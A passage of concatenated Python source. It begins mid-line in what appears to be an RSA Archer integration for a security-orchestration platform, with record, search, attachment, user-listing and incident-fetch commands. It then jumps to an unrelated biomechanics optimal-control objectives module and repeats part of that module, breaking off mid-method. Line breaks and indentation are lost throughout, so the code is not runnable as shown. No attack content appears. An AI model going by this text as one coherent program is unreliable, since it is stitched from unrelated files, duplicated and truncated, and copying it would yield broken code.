client.do_request('GET', '/api/core/system/application') else 'Connection failed.' def search_applications_command(client: Client, args: Dict[str, str]): app_id = args.get('applicationId') limit = args.get('limit') endpoint_url = '/api/core/system/application/' if app_id: endpoint_url = f'/api/core/system/application/{app_id}' res = client.do_request('GET', endpoint_url) elif limit: res = client.do_request('GET', endpoint_url, params={"$top": limit}) errors = get_errors_from_res(res) if errors: return_error(errors) if isinstance(res, dict): res = [res] applications = [] for app in res: if app.get('RequestedObject') and app.get('IsSuccessful'): app_obj = app['RequestedObject'] applications.append({'Id': app_obj.get('Id'), 'Type': app_obj.get('Type'), 'Name': app_obj.get('Name'), 'LanguageId': app_obj.get('LanguageId'), 'Status': app_obj.get('Status'), 'Guid': app_obj.get('Guid')}) markdown = tableToMarkdown('Search applications results', applications) context: dict = { 'Archer.Application(val.Id && val.Id == obj.Id)': applications} return_outputs(markdown, context, res) def get_application_fields_command(client: Client, args: Dict[str, str]): app_id = args.get('applicationId') res = client.do_request('GET', f'/api/core/system/fielddefinition/application/{app_id}') fields = [] for field in res: if field.get('RequestedObject') and field.get('IsSuccessful'): field_obj = field['RequestedObject'] field_type = field_obj.get('Type') fields.append({'FieldId': field_obj.get('Id'), 'FieldType': FIELD_TYPE_DICT.get(field_type, 'Unknown'), 'FieldName': field_obj.get('Name'), 'LevelID': field_obj.get('LevelId')}) else: errors = get_errors_from_res(field) if errors: return_error(errors) markdown = tableToMarkdown('Application fields', fields) context: dict = {'Archer.ApplicationField(val.FieldId && val.FieldId == obj.FieldId)': fields} return_outputs(markdown, context, res) def get_field_command(client: Client, args: Dict[str, str]): field_id = args.get('fieldID') res = client.do_request('GET', f'/api/core/system/fielddefinition/{field_id}') errors = get_errors_from_res(res) if errors: return_error(errors) field = {} if res.get('RequestedObject') and res.get('IsSuccessful'): field_obj = res['RequestedObject'] item_type = field_obj.get('Type') item_type = FIELD_TYPE_DICT.get(item_type, 'Unknown') field = {'FieldId': field_obj.get('Id'), 'FieldType': item_type, 'FieldName': field_obj.get('Name'), 'LevelID': field_obj.get('LevelId')} markdown = tableToMarkdown('Application field', field) context: dict = { 'Archer.ApplicationField(val.FieldId && val.FieldId == obj.FieldId)': field } return_outputs(markdown, context, res) def get_mapping_by_level_command(client: Client, args: Dict[str, str]): level = args.get('level') res = client.do_request('GET', f'/api/core/system/fielddefinition/level/{level}') items = [] for item in res: if item.get('RequestedObject') and item.get('IsSuccessful'): item_obj = item['RequestedObject'] item_type = item_obj.get('Type') if item_type: item_type = FIELD_TYPE_DICT.get(item_type, 'Unknown') else: item_type = 'Unknown' items.append({'Id': item_obj.get('Id'), 'Name': item_obj.get('Name'), 'Type': item_type, 'LevelId': item_obj.get('LevelId')}) else: errors = get_errors_from_res(item) if errors: return_error(errors) markdown = tableToMarkdown(f'Level mapping for level {level}', items) context: dict = {'Archer.LevelMapping(val.Id && val.Id == obj.Id)': items} return_outputs(markdown, context, res) def get_record_command(client: Client, args: Dict[str, str]): record_id = args.get('contentId') app_id = args.get('applicationId') record, res, errors = client.get_record(app_id, record_id) if errors: return_error(errors) markdown = tableToMarkdown('Record details', record) context: dict = { 'Archer.Record(val.Id && val.Id == obj.Id)': record } return_outputs(markdown, context, res) def create_record_command(client: Client, args: Dict[str, str]): app_id = args.get('applicationId') fields_values = args.get('fieldsToValues') try: level_data = client.get_level_by_app_id(app_id)[0] except IndexError as exc: raise DemistoException( 'Got no level by app id. You might be using the wrong application id' ) from exc field_contents = generate_field_contents(client, fields_values, level_data['mapping']) body = {'Content': {'LevelId': level_data['level'], 'FieldContents': field_contents}} res = client.do_request('Post', '/api/core/content', data=body) errors = get_errors_from_res(res) if errors: return_error(errors) if res.get('RequestedObject') and res.get('IsSuccessful'): rec_id = res['RequestedObject']['Id'] return_outputs(f'Record created successfully, record id: {rec_id}', {'Archer.Record.Id': rec_id}, res) def delete_record_command(client: Client, args: Dict[str, str]): record_id = args.get('contentId') res = client.do_request('Delete', f'/api/core/content/{record_id}') errors = get_errors_from_res(res) if errors: return_error(errors) return_outputs(f'Record {record_id} deleted successfully', {}, res) def update_record_command(client: Client, args: Dict[str, str]): app_id = args.get('applicationId') record_id = args.get('contentId') fields_values = args.get('fieldsToValues') level_data = client.get_level_by_app_id(app_id)[0] field_contents = generate_field_contents(client, fields_values, level_data['mapping']) body = {'Content': {'Id': record_id, 'LevelId': level_data['level'], 'FieldContents': field_contents}} res = client.do_request('Put', '/api/core/content', data=body) errors = get_errors_from_res(res) if errors: return_error(errors) if res.get('IsSuccessful'): return_outputs(f'Record {record_id} updated successfully', {}, res) else: raise DemistoException('Update record failed') def execute_statistics_command(client: Client, args: Dict[str, str]): report_guid = args.get('reportGuid') max_results = args.get('maxResults') res, raw_res = client.do_soap_request('archer-execute-statistic-search-by-report', report_guid=report_guid, max_results=max_results) if res: res = json.loads(xml2json(res)) return_outputs(res, {}, {}) def get_reports_command(client: Client, args: Dict[str, str]): res, raw_res = client.do_soap_request('archer-get-reports') res = json.loads(xml2json(res)) ec = res.get('ReportValues').get('ReportValue') context: dict = { 'Archer.Report(val.ReportGUID && val.ReportGUID == obj.ReportGUID)': ec } return_outputs(ec, context, {}) def search_options_command(client: Client, args: Dict[str, str]): report_guid = args.get('reportGuid') res, raw_res = client.do_soap_request('archer-get-search-options-by-guid', report_guid=report_guid) if res.startswith('<'): res = json.loads(xml2json(res)) return_outputs(res, {}, {}) def reset_cache_command(client: Client, args: Dict[str, str]): demisto.setIntegrationContext({}) return_outputs('', {}, '') def get_value_list_command(client: Client, args: Dict[str, str]): field_id = args.get('fieldID') field_data = client.get_field_value_list(field_id) markdown = tableToMarkdown(f'Value list for field {field_id}', field_data['ValuesList']) context: dict = { 'Archer.ApplicationField(val.FieldId && val.FieldId == obj.FieldId)': field_data } return_outputs(markdown, context, {}) def upload_file_command(client: Client, args: Dict[str, str]) -> str: """Uploading a file to archer as an attachment Arguments: client: A client to use in order to send the api callarcher-get-file args: demisto args Returns: An attachment id from Archer """ entry_id = args.get('entryId') file_name, file_bytes = get_file(entry_id) body = {'AttachmentName': file_name, 'AttachmentBytes': file_bytes} res = client.do_request('POST', '/api/core/content/attachment', data=body) errors = get_errors_from_res(res) if errors: return_error(errors) if res.get('RequestedObject') and res.get('IsSuccessful'): attachment_id = res['RequestedObject'].get('Id') else: raise DemistoException('Upload file failed') return_outputs(f'File uploaded successfully, attachment ID: {attachment_id}', {}, res) return attachment_id def upload_and_associate_command(client: Client, args: Dict[str, str]): """Uploading an entry to archer. than, if needed, associate it to a record. """ app_id = args.get('applicationId') content_id = args.get('contentId') associate_field = args.get('associatedField') should_associate_to_record = app_id and content_id if not should_associate_to_record: # If both app_id and content_id if app_id or content_id: # If one of them, raise error. User's mistake raise DemistoException( 'Found arguments to associate an attachment to a record, but not all required arguments supplied' ) attachment_id = upload_file_command(client, args) if should_associate_to_record: args['fieldsToValues'] = json.dumps({associate_field: [attachment_id]}) update_record_command(client, args) def download_file_command(client: Client, args: Dict[str, str]): attachment_id = args.get('fileId') res = client.do_request('GET', f'/api/core/content/attachment/{attachment_id}') errors = get_errors_from_res(res) if errors: return_error(errors) if res.get('RequestedObject') and res.get('IsSuccessful'): content = base64.b64decode(res['RequestedObject'].get('AttachmentBytes')) filename = res['RequestedObject'].get('AttachmentName') return demisto.results(fileResult(filename, content)) else: return_error('File downloading failed', outputs=res) def list_users_command(client: Client, args: Dict[str, str]): user_id = args.get('userId') if user_id: res = client.do_request('GET', f'/api/core/system/user/{user_id}') else: res = client.do_request('GET', '/api/core/system/user') errors = get_errors_from_res(res) if errors: return_error(errors) if isinstance(res, dict): res = [res] users = [] for user in res: if user.get('RequestedObject') and user.get('IsSuccessful'): user_obj = user['RequestedObject'] users.append({'Id': user_obj.get('Id'), 'DisplayName': user_obj.get('DisplayName'), 'FirstName': user_obj.get('FirstName'), 'MiddleName': user_obj.get('MiddleName'), 'LastName': user_obj.get('LastName'), 'AccountStatus': ACCOUNT_STATUS_DICT[user_obj.get('AccountStatus')], 'LastLoginDate': user_obj.get('LastLoginDate'), 'UserName': user_obj.get('UserName')}) markdown = tableToMarkdown('Users list', users) context: dict = { 'Archer.User(val.Id && val.Id == obj.Id)': users } return_outputs(markdown, context, res) def search_records_command(client: Client, args: Dict[str, str]): app_id = args.get('applicationId') field_to_search = args.get('fieldToSearchOn') search_value = args.get('searchValue') max_results = args.get('maxResults', 10) date_operator = args.get('dateOperator') numeric_operator = args.get('numeric-operator') fields_to_display = argToList(args.get('fieldsToDisplay')) fields_to_get = argToList(args.get('fieldsToGet')) full_data = args.get('fullData', 'true') == 'true' if fields_to_get and 'Id' not in fields_to_get: fields_to_get.append('Id') if not all(f in fields_to_get for f in fields_to_display): return_error('fields-to-display param should have only values from fields-to-get') if full_data: level_data = client.get_level_by_app_id(app_id)[0] fields_mapping = level_data['mapping'] fields_to_get = [fields_mapping[next(iter(fields_mapping))]['Name']] records, raw_res = client.search_records( app_id, fields_to_get, field_to_search, search_value, numeric_operator, date_operator, max_results=max_results ) records = list(map(lambda x: x['record'], records)) if full_data: records_full = [] for rec in records: record_item, _, errors = client.get_record(app_id, rec['Id']) if not errors: records_full.append(record_item) records = records_full hr = [] if full_data: hr = records else: for record in records: hr.append({f: record[f] for f in fields_to_display}) markdown = tableToMarkdown('Search records results', hr) context: dict = {'Archer.Record(val.Id && val.Id == obj.Id)': records} return_outputs(markdown, context, {}) def search_records_by_report_command(client: Client, args: Dict[str, str]): report_guid = args.get('reportGuid') res, raw_res = client.do_soap_request('archer-search-records-by-report', report_guid=report_guid) if not res: return_outputs(f'No records found for report {report_guid}', {}, json.loads(xml2json(raw_res))) return raw_records = json.loads(xml2json(res)) records = [] ec = {} if raw_records.get('Records') and raw_records['Records'].get('Record'): level_id = raw_records['Records']['Record'][0]['@levelId'] level_res = client.do_request('GET', f'/api/core/system/fielddefinition/level/{level_id}') fields = {} for field in level_res: if field.get('RequestedObject') and field.get('IsSuccessful'): field_item = field.get('RequestedObject') field_id = str(field_item.get('Id')) fields[field_id] = {'Type': field_item.get('Type'), 'Name': field_item.get('Name')} records = client.xml_to_records(res, fields) records = list(map(lambda x: x['record'], records)) ec = {'Record': records, 'RecordsAmount': len(records), 'ReportGUID': report_guid} markdown = tableToMarkdown('Search records by report results', records) context: dict = {'Archer.SearchByReport(val.ReportGUID && val.ReportGUID == obj.ReportGUID)': ec} return_outputs(markdown, context, json.loads(xml2json(raw_res))) def print_cache_command(client: Client, args: Dict[str, str]): cache = demisto.getIntegrationContext() return_outputs(cache, {}, {}) def fetch_incidents( client: Client, params: dict, from_time: str ) -> Tuple[list, str]: """Fetches incidents. Args: client: Client derived from BaseClient params: demisto.params dict. from_time: Time to start the fetch from Returns: next_run object, incidents """ # Not using get method as those params are a must app_id = params['applicationId'] date_field = params['applicationDateField'] max_results = params.get('fetch_limit', 10) offset = int(params.get('time_zone', '0')) fields_to_display = argToList(params.get('fields_to_fetch')) fields_to_display.append(date_field) day_first = argToBoolean(params.get('useEuropeanTime', False)) from_time_utc_obj = parser(from_time).replace(tzinfo=timezone.utc) from_time_utc = format_time(from_time_utc_obj, day_first) # API Call records, raw_res = client.search_records( app_id, fields_to_display, date_field, from_time_utc, date_operator='GreaterThan', max_results=max_results ) # Build incidents incidents = list() next_fetch = from_time_utc_obj for record in records: incident, incident_created_time = client.record_to_incident( record, app_id, date_field, day_first=day_first, offset=offset ) if incident_created_time > next_fetch: next_fetch = incident_created_time incidents.append(incident) return incidents, next_fetch.strftime(OCCURRED_FORMAT) def get_fetch_time(last_fetch: dict, first_fetch_time: str, offset: int = 0) -> str: """Gets lastRun object and first fetch time (str, 3 days) and returns a datetime object of the last run if exists, else datetime of the first fetch time Args: last_fetch: a dict that may contain 'last_fetch' first_fetch_time: time back in simple format (3 days) offset: time difference between CortexXSOAR machine and Archer, in minutes. Returns: Time to start fetch from """ if next_run := last_fetch.get('last_fetch'): start_fetch = parser(next_run) else: start_fetch, _ = parse_date_range(first_fetch_time) if offset: start_fetch = start_fetch - timedelta(minutes=offset) start_fetch = start_fetch.replace(tzinfo=None) return start_fetch.strftime(OCCURRED_FORMAT) def main(): params = demisto.params() credentials = params.get('credentials') base_url = params.get('url').strip('/') cache = demisto.getIntegrationContext() if not cache.get('fieldValueList'): cache['fieldValueList'] = {} demisto.setIntegrationContext(cache) client = Client( base_url, credentials.get('identifier'), credentials.get('password'), params.get('instanceName'), params.get('userDomain'), verify=not params.get('insecure', False), proxy=params.get('proxy', False) ) commands = { 'archer-search-applications': search_applications_command, 'archer-get-application-fields': get_application_fields_command, 'archer-get-field': get_field_command, 'archer-get-mapping-by-level': get_mapping_by_level_command, 'archer-get-record': get_record_command, 'archer-create-record': create_record_command, 'archer-delete-record': delete_record_command, 'archer-update-record': update_record_command, 'archer-execute-statistic-search-by-report': execute_statistics_command, 'archer-get-reports': get_reports_command, 'archer-get-search-options-by-guid': search_options_command, 'archer-reset-cache': reset_cache_command, 'archer-get-valuelist': get_value_list_command, 'archer-upload-file': upload_and_associate_command, 'archer-get-file': download_file_command, 'archer-list-users': list_users_command, 'archer-search-records': search_records_command, 'archer-search-records-by-report': search_records_by_report_command, 'archer-print-cache': print_cache_command, } command = demisto.command() LOG(f'Command being called is {command}') try: if command == 'fetch-incidents': offset = int(params['time_zone']) from_time = get_fetch_time( demisto.getLastRun(), params.get('fetch_time', '3 days'), offset ) incidents, next_fetch = fetch_incidents( client=client, params=params, from_time=from_time ) demisto.debug(f'Setting next run to {next_fetch}') demisto.setLastRun({'last_fetch': next_fetch}) demisto.incidents(incidents) elif command == 'test-module': demisto.results(test_module(client, params)) elif command in commands: return commands[command](client, demisto.args()) else: return_error('Command not found.') except Exception as e: return_error(f'Unexpected error: {str(e)}, traceback: {traceback.format_exc()}') if __name__ in ('__builtin__', 'builtins'): main()
from enum import Enum import numpy as np import casadi from casadi import dot, sum1 from .penalty import PenaltyType, PenaltyFunctionAbstract from ..misc.enums import Instant from ..misc.options_lists import OptionList, OptionGeneric class ObjectiveOption(OptionGeneric): def __init__( self, objective, instant=Instant.DEFAULT, quadratic=None, weight=1, custom_type=None, phase=0, **params ): custom_function = None if not isinstance(objective, Objective.Lagrange) and not isinstance(objective, Objective.Mayer): custom_function = objective if custom_type is None: raise RuntimeError( "Custom objective function detected, but custom_function is missing. " "It should either be Objective.Mayer or Objective.Lagrange" ) objective = custom_type(custom_type.CUSTOM) if isinstance(objective, Objective.Lagrange): pass elif isinstance(objective, Objective.Mayer): pass elif isinstance(objective, Objective.Parameter): pass else: raise RuntimeError( "Custom objective function detected, but custom_function is invalid. " "It should either be Objective.Mayer or Objective.Lagrange" ) super(ObjectiveOption, self).__init__(type=objective, phase=phase, **params) self.instant = instant self.quadratic = quadratic self.weight = weight self.custom_function = custom_function class ObjectiveList(OptionList): def add(self, objective, **extra_arguments): if isinstance(objective, ObjectiveOption): self.copy(objective) else: super(ObjectiveList, self)._add(objective=objective, option_type=ObjectiveOption, **extra_arguments) class ObjectiveFunction: """ Different conditions between biorbd geometric structures. """ class LagrangeFunction(PenaltyFunctionAbstract): """ Lagrange type objectives. (integral of the objective over the optimized movement duration) """ class Functions: """ Biomechanical objectives """ @staticmethod def minimize_time(penalty, ocp, nlp, t, x, u, p, **extra_param): """Minimizes the duration of the movement (Lagrange).""" val = 1 ObjectiveFunction.LagrangeFunction.add_to_penalty(ocp, nlp, val, penalty, **extra_param) @staticmethod def add_to_penalty(ocp, nlp, val, penalty, target=None, **extra_arguments): """ Adds an objective. :param val: Value to be optimized. (MX.sym from CasADi) :param penalty: Index of the objective. (integer) :param weight: Weight of the objective. (float) :param quadratic: If True, value is squared. (bool) """ ObjectiveFunction.add_to_penalty(ocp, nlp, val, penalty, dt=nlp["dt"], target=target) @staticmethod def clear_penalty(ocp, nlp, penalty): """ Resets specified penalty. """ return ObjectiveFunction.clear_penalty(ocp, nlp, penalty) @staticmethod def _parameter_modifier(penalty_function, parameters): """Modification of parameters""" # Everything that should change the entry parameters depending on the penalty can be added here if penalty_function == Objective.Lagrange.MINIMIZE_TIME.value[0]: if not parameters.quadratic: parameters.quadratic = True PenaltyFunctionAbstract._parameter_modifier(penalty_function, parameters) @staticmethod def _span_checker(penalty_function, instant, nlp): """Raises errors on the span of penalty functions""" # Everything that is suspicious in terms of the span of the penalty function ca be checked here PenaltyFunctionAbstract._span_checker(penalty_function, instant, nlp) class MayerFunction(PenaltyFunctionAbstract): """ Mayer type objectives. (value of the objective at one time point, usually the end) """ class Functions: """ Biomechanical objectives """ @staticmethod def minimize_time(penalty, ocp, nlp, t, x, u, p, **extra_param): """Minimizes the duration of the movement (Mayer).""" val = nlp["tf"] ObjectiveFunction.MayerFunction.add_to_penalty(ocp, nlp, val, penalty, **extra_param) @staticmethod def inter_phase_continuity(ocp, pt): # Dynamics must be respected between phases penalty = OptionGeneric() penalty.idx = -1 penalty.quadratic = pt.quadratic penalty.weight = pt.weight pt.base.clear_penalty(ocp, None, penalty) val = pt.type.value[0](ocp, pt) pt.base.add_to_penalty(ocp, None, val, penalty, **pt.params) @staticmethod def add_to_penalty(ocp, nlp, val, penalty, target=None, **extra_param): """ Adds an objective. :param val: Value to be optimized. (MX.sym from CasADi) :param penalty: Index of the objective. (integer) :param weight: Weight of the objective. (float) :param quadratic: If True, value is squared (bool) """ ObjectiveFunction.add_to_penalty(ocp, nlp, val, penalty, dt=1, target=target, **extra_param) # # TODO: This next block is at the wrong place # if nlp: # if quadratic: # # TODO : This seems simply wrong # J_acados_mayer = casadi.dot(nlp["X"][0], nlp["X"][0]) * weight # else: # # TODO : So this is # J_acados_mayer = casadi.sum1(nlp["X"][0]) * weight # nlp["J_acados_mayer"].append(J_acados_mayer) # TODO: Find a better name (J_mayer_from_node_0?) # else: # pass @staticmethod def clear_penalty(ocp, nlp, penalty_idx): """ Resets specified penalty. """ return ObjectiveFunction.clear_penalty(ocp, nlp, penalty_idx) @staticmethod def _parameter_modifier(penalty_function, parameters): """Modification of parameters""" # Everything that should change the entry parameters depending on the penalty can be added here PenaltyFunctionAbstract._parameter_modifier(penalty_function, parameters) @staticmethod def _span_checker(penalty_function, instant, nlp): """Raises errors on the span of penalty functions""" # Everything that is suspicious in terms of the span of the penalty function ca be checked here PenaltyFunctionAbstract._span_checker(penalty_function, instant, nlp) class ParameterFunction(PenaltyFunctionAbstract): """ Mayer type objectives. (value of the objective at one time point, usually the end) """ class Functions: """ Biomechanical objectives """ pass @staticmethod def add_to_penalty(ocp, _, val, penalty, **extra_param): """ Adds an objective. :param val: Value to be optimized. (MX.sym from CasADi) :param penalty: Index of the objective. (integer) :param weight: Weight of the objective. (float) :param quadratic: If True, value is squared (bool) """ ObjectiveFunction.add_to_penalty(ocp, None, val, penalty, dt=1) @staticmethod def clear_penalty(ocp, _, penalty_idx): """ Resets specified penalty. """ return ObjectiveFunction.clear_penalty(ocp, None, penalty_idx) @staticmethod def _parameter_modifier(penalty_function, parameters): """Modification of parameters""" # Everything that should change the entry parameters depending on the penalty can be added here PenaltyFunctionAbstract._parameter_modifier(penalty_function, parameters) @staticmethod def _span_checker(penalty_function, instant, nlp): """Raises errors on the span of penalty functions""" # Everything that is suspicious in terms of the span of the penalty function ca be checked here PenaltyFunctionAbstract._span_checker(penalty_function, instant, nlp) @staticmethod def add_or_replace(ocp, nlp, objective): """ Modifies or raises errors if user provided Instant does not match the objective type. :param objective: New objective to replace with. (dictionary) """ if objective.type.get_type() == ObjectiveFunction.LagrangeFunction: if objective.instant != Instant.ALL and objective.instant != Instant.DEFAULT: raise RuntimeError("Lagrange objective are for Instant.ALL, did you mean Mayer?") objective.instant = Instant.ALL elif objective.type.get_type() == ObjectiveFunction.MayerFunction: if objective.instant == Instant.DEFAULT: objective.instant = Instant.END else: raise RuntimeError("Objective function Type must be either a Lagrange or Mayer type") PenaltyFunctionAbstract.add_or_replace(ocp, nlp, objective) @staticmethod def cyclic(ocp, weight=1): if ocp.nlp[0]["nx"] != ocp.nlp[-1]["nx"]: raise RuntimeError("Cyclic constraint without same nx is not supported yet") ocp.J += ( casadi.dot(ocp.nlp[-1]["X"][-1] - ocp.nlp[0]["X"][0], ocp.nlp[-1]["X"][-1] - ocp.nlp[0]["X"][0]) * weight ) @staticmethod def add_to_penalty(ocp, nlp, val, penalty, dt=0, target=None): """ Adds objective J to objective array nlp["J"][penalty] or ocp.J[penalty] at index penalty. :param J: Objective. (dict of [val, target, weight, is_quadratic]) :param penalty: Index of the objective. (integer) """ val = val target = target if target is not None else None J = {"objective": penalty, "val": val, "target": target, "dt": dt} if nlp: nlp["J"][penalty.idx].append(J) else: ocp.J[penalty.idx].append(J) @staticmethod def clear_penalty(ocp, nlp, penalty): """ Resets specified objective. Negative penalty index leads to enlargement of the array by one empty space. """ if nlp: J_to_add_to = nlp["J"] else: J_to_add_to = ocp.J if penalty.idx < 0: # Add a new one for i, j in enumerate(J_to_add_to): if not j: penalty.idx = i return else: J_to_add_to.append([]) penalty.idx = len(J_to_add_to) - 1 else: while penalty.idx >= len(J_to_add_to): J_to_add_to.append([]) J_to_add_to[penalty.idx] = [] class Objective: class Lagrange(Enum): """ Different conditions between biorbd geometric structures. """ MINIMIZE_TIME = (ObjectiveFunction.LagrangeFunction.Functions.minimize_time,) MINIMIZE_STATE = (PenaltyType.MINIMIZE_STATE,) TRACK_STATE = (PenaltyType.TRACK_STATE,) MINIMIZE_MARKERS = (PenaltyType.MINIMIZE_MARKERS,) TRACK_MARKERS = (PenaltyType.TRACK_MARKERS,) MINIMIZE_MARKERS_DISPLACEMENT = (PenaltyType.MINIMIZE_MARKERS_DISPLACEMENT,) MINIMIZE_MARKERS_VELOCITY = (PenaltyType.MINIMIZE_MARKERS_VELOCITY,) TRACK_MARKERS_VELOCITY = (PenaltyType.TRACK_MARKERS_VELOCITY,) ALIGN_MARKERS = (PenaltyType.ALIGN_MARKERS,) PROPORTIONAL_STATE = (PenaltyType.PROPORTIONAL_STATE,) PROPORTIONAL_CONTROL = (PenaltyType.PROPORTIONAL_CONTROL,) MINIMIZE_TORQUE = (PenaltyType.MINIMIZE_TORQUE,) TRACK_TORQUE = (PenaltyType.TRACK_TORQUE,) MINIMIZE_TORQUE_DERIVATIVE = (PenaltyType.MINIMIZE_TORQUE_DERIVATIVE,) MINIMIZE_MUSCLES_CONTROL = (PenaltyType.MINIMIZE_MUSCLES_CONTROL,) TRACK_MUSCLES_CONTROL = (PenaltyType.TRACK_MUSCLES_CONTROL,) MINIMIZE_ALL_CONTROLS = (PenaltyType.MINIMIZE_ALL_CONTROLS,) TRACK_ALL_CONTROLS = (PenaltyType.TRACK_ALL_CONTROLS,) MINIMIZE_CONTACT_FORCES = (PenaltyType.MINIMIZE_CONTACT_FORCES,) TRACK_CONTACT_FORCES = (PenaltyType.TRACK_CONTACT_FORCES,) ALIGN_SEGMENT_WITH_CUSTOM_RT = (PenaltyType.ALIGN_SEGMENT_WITH_CUSTOM_RT,) ALIGN_MARKER_WITH_SEGMENT_AXIS = (PenaltyType.ALIGN_MARKER_WITH_SEGMENT_AXIS,) CUSTOM = (PenaltyType.CUSTOM,) @staticmethod def get_type(): """Returns the type of the objective function""" return ObjectiveFunction.LagrangeFunction class Mayer(Enum): """ Different conditions between biorbd geometric structures. """ MINIMIZE_TIME = (ObjectiveFunction.MayerFunction.Functions.minimize_time,) MINIMIZE_STATE = (PenaltyType.MINIMIZE_STATE,) TRACK_STATE = (PenaltyType.TRACK_STATE,) MINIMIZE_MARKERS = (PenaltyType.MINIMIZE_MARKERS,) TRACK_MARKERS = (PenaltyType.TRACK_MARKERS,) MINIMIZE_MARKERS_DISPLACEMENT = (PenaltyType.MINIMIZE_MARKERS_DISPLACEMENT,) MINIMIZE_MARKERS_VELOCITY = (PenaltyType.MINIMIZE_MARKERS_VELOCITY,) TRACK_MARKERS_VELOCITY = (PenaltyType.TRACK_MARKERS_VELOCITY,) ALIGN_MARKERS = (PenaltyType.ALIGN_MARKERS,) PROPORTIONAL_STATE = (PenaltyType.PROPORTIONAL_STATE,) PROPORTIONAL_CONTROL = (PenaltyType.PROPORTIONAL_CONTROL,) MINIMIZE_TORQUE = (PenaltyType.MINIMIZE_TORQUE,) TRACK_TORQUE = (PenaltyType.TRACK_TORQUE,) MINIMIZE_MUSCLES_CONTROL = (PenaltyType.MINIMIZE_MUSCLES_CONTROL,) TRACK_MUSCLES_CONTROL = (PenaltyType.TRACK_MUSCLES_CONTROL,) MINIMIZE_ALL_CONTROLS = (PenaltyType.MINIMIZE_ALL_CONTROLS,) TRACK_ALL_CONTROLS = (PenaltyType.TRACK_ALL_CONTROLS,) MINIMIZE_CONTACT_FORCES = (PenaltyType.MINIMIZE_CONTACT_FORCES,) TRACK_CONTACT_FORCES = (PenaltyType.TRACK_CONTACT_FORCES,) MINIMIZE_PREDICTED_COM_HEIGHT = (PenaltyType.MINIMIZE_PREDICTED_COM_HEIGHT,) ALIGN_SEGMENT_WITH_CUSTOM_RT = (PenaltyType.ALIGN_SEGMENT_WITH_CUSTOM_RT,) ALIGN_MARKER_WITH_SEGMENT_AXIS = (PenaltyType.ALIGN_MARKER_WITH_SEGMENT_AXIS,) CUSTOM = (PenaltyType.CUSTOM,) @staticmethod def get_type(): """Returns the type of the objective function""" return ObjectiveFunction.MayerFunction class Parameter(Enum): CUSTOM = (PenaltyType.CUSTOM,) class Analyse: def __init__(self, ocp, sol_obj): self.ocp = ocp self.sol_obj = sol_obj def by_function(self): for idx_phase, phase in enumerate(self.sol_obj): print(f"********** Phase {idx_phase} **********") for idx_obj in range(phase.shape[0]): print( f"{self.ocp.original_values["objective_functions"][idx_phase][idx_phase + idx_obj].type.name} : {np.nansum(phase[idx_obj])}" ) def by_nodes(self): for idx_phase, phase in enumerate(self.sol_obj): print(f"********** Phase {idx_phase} **********") for idx_node in range(phase.shape[1]): print(f"Node {idx_node} : {np.nansum(phase[:, idx_node])}") def mean(self): m = 0 for idx_phase, phase in enumerate(self.sol_obj): m += np.nansum(phase) return m/len(self.sol_obj) @staticmethod def get_objective_values(ocp, sol): def __get_instant(instants, nlp): nodes = [] for node in instants: if isinstance(node, int): if node < 0 or node > nlp["ns"]: raise RuntimeError(f"Invalid instant, {node} must be between 0 and {nlp["ns"]}") nodes.append(node) elif node == Instant.START: nodes.append(0) elif node == Instant.MID: if nlp["ns"] % 2 == 1: raise (ValueError("Number of shooting points must be even to use MID")) nodes.append(nlp["ns"] // 2) elif node == Instant.INTERMEDIATES: for i in range(1, nlp["ns"] - 1): nodes.append(i) elif node == Instant.END: nodes.append(nlp["ns"] - 1) elif node == Instant.ALL: for i in range(nlp["ns"]): nodes.append(i) return nodes sol = sol["x"] out = [] for idx_phase, nlp in enumerate(ocp.nlp): nJ = len(nlp["J"]) - idx_phase out.append(np.ndarray((nJ, nlp["ns"]))) out[-1][:][:] = np.nan for idx_obj_func in range(nJ): nodes = __get_instant(nlp["J"][idx_phase + idx_obj_func][0]["objective"].instant, nlp) nodes = nodes[: len(nlp["J"][idx_phase + idx_obj_func])] for node, idx_node in enumerate(nodes): obj = casadi.Function( "obj", [ocp.V], [get_objective_value(nlp["J"][idx_phase + idx_obj_func][node])] ) out[-1][idx_obj_func][idx_node] = obj(sol) return out def get_objective_value(j_dict): val = j_dict["val"] if j_dict["target"] is not None: val -= j_dict["target"] if j_dict["objective"].quadratic: val = dot(val, val) else: val = sum1(val) val *= j_dict["objective"].weight * j_dict["dt"] return val
from enum import Enum import numpy as np import casadi from casadi import dot, sum1 from .penalty import PenaltyType, PenaltyFunctionAbstract from ..misc.enums import Instant from ..misc.options_lists import OptionList, OptionGeneric class ObjectiveOption(OptionGeneric): def __init__( self, objective, instant=Instant.DEFAULT, quadratic=None, weight=1, custom_type=None, phase=0, **params ): custom_function = None if not isinstance(objective, Objective.Lagrange) and not isinstance(objective, Objective.Mayer): custom_function = objective if custom_type is None: raise RuntimeError( "Custom objective function detected, but custom_function is missing. " "It should either be Objective.Mayer or Objective.Lagrange" ) objective = custom_type(custom_type.CUSTOM) if isinstance(objective, Objective.Lagrange): pass elif isinstance(objective, Objective.Mayer): pass elif isinstance(objective, Objective.Parameter): pass else: raise RuntimeError( "Custom objective function detected, but custom_function is invalid. " "It should either be Objective.Mayer or Objective.Lagrange" ) super(ObjectiveOption, self).__init__(type=objective, phase=phase, **params) self.instant = instant self.quadratic = quadratic self.weight = weight self.custom_function = custom_function class ObjectiveList(OptionList): def add(self, objective, **extra_arguments): if isinstance(objective, ObjectiveOption): self.copy(objective) else: super(ObjectiveList, self)._add(objective=objective, option_type=ObjectiveOption, **extra_arguments) class ObjectiveFunction: """ Different conditions between biorbd geometric structures. """ class LagrangeFunction(PenaltyFunctionAbstract): """ Lagrange type objectives. (integral of the objective over the optimized movement duration) """ class Functions: """ Biomechanical objectives """ @staticmethod def minimize_time(penalty, ocp, nlp, t, x, u, p, **extra_param): """Minimizes the duration of the movement (Lagrange).""" val = 1 ObjectiveFunction.LagrangeFunction.add_to_penalty(ocp, nlp, val, penalty, **extra_param) @staticmethod def add_to_penalty(ocp, nlp, val, penalty, target=None, **extra_arguments): """ Adds an objective. :param val: Value to be optimized. (MX.sym from CasADi) :param penalty: Index of the objective. (integer) :param weight: Weight of the objective. (float) :param quadratic: If True, value is squared. (bool) """ ObjectiveFunction.add_to_penalty(ocp, nlp, val, penalty, dt=nlp["dt"], target=target) @staticmethod def clear_penalty(ocp, nlp, penalty): """ Resets specified penalty. """ return ObjectiveFunction.clear_penalty(ocp, nlp, penalty) @staticmethod def _parameter_modifier(penalty_function, parameters): """Modification of parameters""" # Everything that should change the entry parameters depending on the penalty can be added here if penalty_function == Objective.Lagrange.MINIMIZE_TIME.value[0]: if not parameters.quadratic: parameters.quadratic = True 